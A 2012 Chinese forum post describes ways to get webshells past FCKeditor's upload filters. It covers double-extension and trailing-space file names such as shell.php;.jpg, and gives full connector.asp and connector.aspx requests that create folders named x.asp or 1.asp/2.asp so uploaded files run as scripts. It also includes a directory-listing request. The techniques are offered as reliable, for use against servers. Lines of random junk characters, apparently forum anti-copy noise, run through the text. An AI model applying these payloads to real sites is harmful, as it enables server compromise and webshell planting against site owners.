很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
7 k5 B& s: K5 w- x1 K; _: r
2 r: T \# k( T- s+ t& Y: r提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。9 X9 Y2 j5 a4 p: J- f8 A
8 Z* c5 J: b" Q+ ^) \ X+ ~' q
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。: D% W" y; W! ]
|( q; y4 D8 p6 \# T& ]% S0 H突破建立文件夹:
; _. d* N2 c7 ?2 \, i4 r8 B; D
$ h* s9 v& G" |6 n- feditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
/ v& h% V4 H! ?0 _+ P; C4 q8 j2 l9 c* s( Q- c
参数:
9 n5 d/ l( z" v I$ V0 K% c
' [. y# P' A( p* E4 K当前目录名:CurrentFolder=/qing.asp
; H- P% [1 b% P q" Y" \- u ~ I- q! Y$ L( ]$ Y( R1 G" I
新的目录名:NewFolderName=x.asp
% X. d' |+ N/ B# V$ H2 w% B. Y( b2 V$ x$ K/ m
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……6 B+ [* h6 U: g/ M$ @2 I* h. v
# u8 }) F O) w' l4 [9 @& i8 k$ ^. `那么 x.asp 就已经建立生成了,此方法百试百灵!
4 Q3 f+ i" M( D& \8 `" r8 ]# Q* @& x3 c( ?4 |: }9 H
新建文件夹参数 x.asp,基本都能搞定。
+ E+ U G9 w5 r: u3 X4 j
/ j9 z. t9 Z% G3 _下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
7 R I1 q* I$ Y+ ]6 G
0 M* F5 v+ q Z, E3 h+ p% N" Paspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp0 C i1 F9 ~& R. g
* y. v. v1 I0 d3 t9 O* x3 A
获取文件列表
) @7 o5 p3 [( C' b' g) }+ o% B2 n aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
' ]% Z D# ~8 G5 x
6 w+ D/ B( Z& y! ?4 C9 g- [) T |
发表于 2012-12-31 09:27:09
收藏
支持
反对